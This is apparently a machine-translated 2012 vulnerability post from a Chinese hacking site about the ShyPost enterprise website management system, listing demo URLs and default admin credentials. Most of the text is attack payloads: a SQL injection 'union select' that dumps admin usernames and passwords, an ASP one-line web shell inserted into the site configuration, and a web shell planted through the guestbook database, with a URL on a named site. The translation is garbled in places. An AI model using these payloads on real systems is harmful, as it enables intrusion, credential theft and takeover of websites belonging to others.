Lucene search

K
myhack58佚名MYHACK58:62201233248
HistoryMar 04, 2012 - 12:00 a.m.

shypostShyPost enterprise website management system a number of vulnerabilities-vulnerability warning-the black bar safety net

2012-03-0400:00:00
佚名
www.myhack58.com
6

ShyPost enterprise management system with dozens of templates, the user can freely choose a different template background management functions is the same, the following is one of the templates before and after the test, welcome to the user testing.

Background demo: http://www.shypost.com/demo/admin

Test account: admin password: admin

The front Desk demo: http://www.shypost.com/demo

Sale price: 3 5 0 Yuan/sets

1, the injection:

union select 1,2,username,password,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1 from admin

Take the shell:

The website configuration is inserted:“%><%eval request(“a”)%><%s=”

Connection http://yoursite.com/inc/config.asp

2, Write the horse:

Guestbook written word, the connection http://www. badguest. cn/databases/databases. asp

3, other number of issues